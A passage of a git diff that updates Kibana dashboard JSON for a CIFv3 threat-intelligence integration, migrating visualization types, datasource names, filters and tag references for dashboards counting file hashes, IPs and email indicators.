@@ } }, "title": "Unique MD5 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -170,8 +192,7 @@ }, "panelIndex": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98", "title": "Unique MD5 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -194,7 +215,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "49b7070a-f1d3-46e1-a980-2f6d6d130167": { "columnOrder": [ @@ -231,7 +252,7 @@ } }, "title": "Unique SHA256 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -245,8 +266,7 @@ }, "panelIndex": "93e32abe-87e3-469e-b7e9-a7ef7dfa2cce", "title": "Unique SHA256 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -265,7 +285,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "2825d170-daeb-4a6d-9d8f-8fda4dccffcc": { "columnOrder": [ @@ -295,12 +315,15 @@ "visualization": { "accessor": "cb37ded7-9f40-418f-bfb9-6250652373d7", "layerId": "2825d170-daeb-4a6d-9d8f-8fda4dccffcc", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -314,8 +337,7 @@ }, "panelIndex": "703fd39c-9642-4c7d-93c8-056f019acf42", "title": "Unique SSDEEP [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -334,7 +356,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "ace6c894-6dac-441d-b0db-3e246db99579": { "columnOrder": [ @@ -383,15 +405,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "4c6f7061-d5e9-4c04-b9b2-39b984b06393" - ], "layerId": "ace6c894-6dac-441d-b0db-3e246db99579", "layerType": "data", "legendDisplay": "default", - "metric": "e00a1b25-655b-4541-8ce0-1f84bdb16b1e", + "legendSize": "auto", + "metrics": [ + "e00a1b25-655b-4541-8ce0-1f84bdb16b1e" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "4c6f7061-d5e9-4c04-b9b2-39b984b06393" + ] } ], "shape": "treemap" @@ -413,8 +438,7 @@ }, "panelIndex": "9717eae1-9937-41e7-bad1-e9ce43d06723", "title": "File Descriptions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -437,7 +461,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "85ad73b3-3b76-49f1-ad20-6256b58918f8": { "columnOrder": [ @@ -474,7 +498,7 @@ } }, "title": "Unique SHA1 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -488,8 +512,7 @@ }, "panelIndex": "e9b6f0ad-5e6b-44da-923e-dc0d5ccfdfea", "title": "Unique SHA1 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -508,7 +531,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "331e77de-53be-48a4-8793-3fe9a23b22b1": { "columnOrder": [ @@ -538,12 +561,15 @@ "visualization": { "accessor": "428df405-7955-4c10-94c1-0791e75aed8f", "layerId": "331e77de-53be-48a4-8793-3fe9a23b22b1", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -557,8 +583,7 @@ }, "panelIndex": "cb4ca769-08b2-4570-8a30-27cff9b77093", "title": "Unique SHA512 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -577,7 +602,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "4c3ad4e3-46af-447e-a4ce-dab516c52797": { "columnOrder": [ @@ -607,12 +632,15 @@ "visualization": { "accessor": "181798f7-2b90-44e1-b76a-2f17b7210690", "layerId": "4c3ad4e3-46af-447e-a4ce-dab516c52797", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -626,19 +654,17 @@ }, "panelIndex": "823f92b7-a2ff-4883-aad1-28d3652371fe", "title": "Unique IMPHASH [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Files", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:49.019Z", "id": "ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -650,6 +676,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98:indexpattern-datasource-current-indexpattern", @@ -722,9 +753,15 @@ }, { "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" + }, + { + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json index 364b0bb6569..be86537c909 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about IP type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -59,6 +58,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -70,6 +91,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -109,8 +132,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -129,7 +151,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "79edd9a4-1178-4294-94df-5d4b145d0e40": { "columnOrder": [ @@ -159,12 +181,15 @@ "visualization": { "accessor": "d1ce22a5-8010-4830-8c61-e8da8c2b2d11", "layerId": "79edd9a4-1178-4294-94df-5d4b145d0e40", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -178,8 +203,7 @@ }, "panelIndex": "7725b9bd-df8d-491c-a518-fe00a4538ebc", "title": "Unique IPs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -198,7 +222,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "e8210fab-252e-4357-82f5-c8fc55fe2057": { "columnOrder": [ @@ -228,12 +252,15 @@ "visualization": { "accessor": "937cc845-c2e1-412a-b419-97c9d8076bee", "layerId": "e8210fab-252e-4357-82f5-c8fc55fe2057", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -247,8 +274,7 @@ }, "panelIndex": "329518f4-c5f9-42b0-b396-85ffcbb8cda3", "title": "Unique ASNs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -267,7 +293,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "864ef66d-9195-45a5-9dcd-916bcac76fd1": { "columnOrder": [ @@ -281,7 +307,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "d8bba7bc-4a82-40c3-a858-e92244ef476c": { "dataType": "number", @@ -316,15 +342,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "d8bba7bc-4a82-40c3-a858-e92244ef476c" - ], "layerId": "864ef66d-9195-45a5-9dcd-916bcac76fd1", "layerType": "data", "legendDisplay": "default", - "metric": "1c86e415-dcb9-49ae-aa85-e4c7c0ddffd7", + "legendSize": "auto", + "metrics": [ + "1c86e415-dcb9-49ae-aa85-e4c7c0ddffd7" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "d8bba7bc-4a82-40c3-a858-e92244ef476c" + ] } ], "shape": "treemap" @@ -346,8 +375,7 @@ }, "panelIndex": "c651f85b-26e4-481e-91ff-39267e540183", "title": "Most Prevalent ASNs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -366,7 +394,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b3600118-bbef-4f41-b472-c08e802518c3": { "columnOrder": [ @@ -380,7 +408,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "deabebaa-8bfa-4b99-8996-5dd59ecd37ca": { "customLabel": true, @@ -424,7 +452,9 @@ } ], "layerId": "b3600118-bbef-4f41-b472-c08e802518c3", - "layerType": "data" + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 } }, "title": "", @@ -443,8 +473,7 @@ }, "panelIndex": "aea51b8a-0962-4b21-aa7e-7c599f0f45a4", "title": "Most Common Countries [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -463,7 +492,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "da912e35-7510-42a6-b546-8d10a33b6546": { "columnOrder": [ @@ -512,15 +541,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "989df1d6-f18f-4874-8601-9e7741935cc8" - ], "layerId": "da912e35-7510-42a6-b546-8d10a33b6546", "layerType": "data", "legendDisplay": "default", - "metric": "f60fc28d-e739-46a2-a0ce-1340df8f7249", + "legendSize": "auto", + "metrics": [ + "f60fc28d-e739-46a2-a0ce-1340df8f7249" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "989df1d6-f18f-4874-8601-9e7741935cc8" + ] } ], "shape": "donut" @@ -542,14 +574,13 @@ }, "panelIndex": "1536f4f2-41d6-4fd0-b6c4-3650a2b5f92d", "title": "Percentage of IP Type [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { "attributes": { "description": "", - "layerListJSON": "[{\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"3df0f38b-db9e-451e-bb01-5a27226075df\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"TILE\"},\"includeInFitToBounds\":true,\"type\":\"VECTOR_TILE\"},{\"sourceDescriptor\":{\"indexPatternId\":\"logs-*\",\"geoField\":\"threat.indicator.geo.location\",\"filterByMapBounds\":true,\"scalingType\":\"MVT\",\"id\":\"13a0c980-6195-4e3e-8506-b383ab8866c2\",\"type\":\"ES_SEARCH\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"tooltipProperties\":[],\"sortField\":\"\",\"sortOrder\":\"desc\",\"topHitsSplitField\":\"\",\"topHitsSize\":1},\"id\":\"0a0a1a3e-d002-47b0-a99a-03eb965b8bc4\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#ea7861\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#e05235\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"STATIC\",\"options\":{\"value\":\"\"}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}}},\"isTimeAware\":true},\"includeInFitToBounds\":true,\"type\":\"TILED_VECTOR\",\"joins\":[]}]", + "layerListJSON": "[{\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"3df0f38b-db9e-451e-bb01-5a27226075df\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"TILE\"},\"includeInFitToBounds\":true,\"type\":\"EMS_VECTOR_TILE\"},{\"sourceDescriptor\":{\"geoField\":\"threat.indicator.geo.location\",\"filterByMapBounds\":true,\"scalingType\":\"MVT\",\"id\":\"13a0c980-6195-4e3e-8506-b383ab8866c2\",\"type\":\"ES_SEARCH\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"tooltipProperties\":[],\"sortField\":\"\",\"sortOrder\":\"desc\",\"topHitsSplitField\":\"\",\"topHitsSize\":1,\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"id\":\"0a0a1a3e-d002-47b0-a99a-03eb965b8bc4\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"fillColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#ea7861\"}},\"lineColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#e05235\"}},\"lineWidth\":{\"type\":\"STATIC\",\"options\":{\"size\":1}},\"iconSize\":{\"type\":\"STATIC\",\"options\":{\"size\":6}},\"iconOrientation\":{\"type\":\"STATIC\",\"options\":{\"orientation\":0}},\"labelText\":{\"type\":\"STATIC\",\"options\":{\"value\":\"\"}},\"labelColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#000000\"}},\"labelSize\":{\"type\":\"STATIC\",\"options\":{\"size\":14}},\"labelBorderColor\":{\"type\":\"STATIC\",\"options\":{\"color\":\"#FFFFFF\"}},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}}},\"isTimeAware\":true},\"includeInFitToBounds\":true,\"type\":\"MVT_VECTOR\",\"joins\":[]}]", "mapStateJSON": "{\"zoom\":1.14,\"center\":{\"lon\":0,\"lat\":19.94277},\"timeFilters\":{\"from\":\"now-75m\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":true,\"interval\":0},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", "title": "", "uiStateJSON": "{\"isLayerTOCOpen\":false,\"openTOCDetails\":[]}" @@ -580,19 +611,17 @@ }, "panelIndex": "ad624736-f1dd-4d77-8517-680e7bc4b882", "title": "IP Source Location [Logs CIFv3]", - "type": "map", - "version": "8.0.0-SNAPSHOT" + "type": "map" } ], "timeRestore": false, "title": "[Logs CIFv3] IPs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:22.282Z", "id": "ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -604,6 +633,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "7725b9bd-df8d-491c-a518-fe00a4538ebc:indexpattern-datasource-current-indexpattern", @@ -660,40 +694,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d:indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "02f1732b-a981-4fba-8b27-b944f2f3c98c:indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "fda93ed1-72f0-4489-80b7-9e69d14f30aa:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "73a752f9-bde5-4396-8ede-e9e77a37182d:indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8994501a-1550-4cf2-857f-d6b6491ffb62:indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "c7c6e8dc-b649-434c-9650-8a1564d4d676:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json index a4f913d02f5..0d9f7b20c30 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about indicators ingested from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -95,8 +118,7 @@ }, "panelIndex": "555e9e6c-04e9-4022-b6df-bda07dde30c4", "title": "Overview Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -230,8 +252,7 @@ }, "panelIndex": "e971fedd-6afd-4d03-93ac-d0c751acc254", "title": "Feed and Indicator Selector [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -250,7 +271,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7": { "columnOrder": [ @@ -265,7 +286,7 @@ "label": "Records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "4d7ca99c-8a53-4a7f-96db-409251c0e391": { "dataType": "string", @@ -333,7 +354,6 @@ "legend": { "isInside": false, "isVisible": true, - "legendSize": "auto", "position": "bottom", "shouldTruncate": false, "showSingleSeries": true @@ -368,8 +388,7 @@ }, "panelIndex": "aab4fac0-d39c-4521-aa9b-0a49d5938e9e", "title": "Indicators ingested per Datastream [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -388,7 +407,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "2c2ce8ee-a793-4242-aad4-06f3a8707b02": { "columnOrder": [ @@ -420,7 +439,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -437,15 +456,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "1d9b6fbf-58e3-427e-a453-edec40466320" - ], "layerId": "2c2ce8ee-a793-4242-aad4-06f3a8707b02", "layerType": "data", "legendDisplay": "default", - "metric": "b6cbd44b-6f5d-4e1e-b1ab-0c09b3a67111", + "legendSize": "auto", + "metrics": [ + "b6cbd44b-6f5d-4e1e-b1ab-0c09b3a67111" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "1d9b6fbf-58e3-427e-a453-edec40466320" + ] } ], "shape": "donut" @@ -467,8 +489,7 @@ }, "panelIndex": "c446ea70-8a63-418e-8997-e43a5f7c5b5d", "title": "Total Percentage by Type [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -488,7 +509,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "070f5dbc-7687-4e97-9a57-5542b401c13f": { "columnOrder": [ @@ -502,7 +523,7 @@ "label": "Total Indicators", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -526,7 +547,7 @@ }, "title": "Total Indicators [Logs CIFv3]", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -540,8 +561,7 @@ }, "panelIndex": "d37eb797-f273-43c2-9004-b947891cce55", "title": "Total Indicators [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -564,7 +584,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "df8e3a91-700b-428a-a763-525076e4d3c8": { "columnOrder": [ @@ -601,7 +621,7 @@ } }, "title": "Total Datastreams [Logs CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -615,19 +635,17 @@ }, "panelIndex": "6509dcc9-bb9c-4c1f-80e9-612f67ada340", "title": "Total Datastreams [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Overview", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:37:44.566Z", "id": "ti_cif3-b4d9d9b0-0a2f-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -639,6 +657,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "e971fedd-6afd-4d03-93ac-d0c751acc254:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", @@ -705,15 +728,16 @@ "type": "index-pattern" }, { - "id": "logs-*", - "name": "f654c447-12d2-41a4-9091-06169af11ba5:indexpattern-datasource-layer-682732d8-8691-4c5a-bf89-de8e30d71dfb", - "type": "index-pattern" + "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" }, { - "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json index 3b5a8713c09..4838688d9f1 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-bda23600-0abb-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about Email type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "cd81a60b-2661-48b3-a40f-ba8451e802a6": { "columnOrder": [ @@ -146,12 +168,15 @@ "visualization": { "accessor": "4f96463f-c5f9-448b-ab9e-7e17a2bd5969", "layerId": 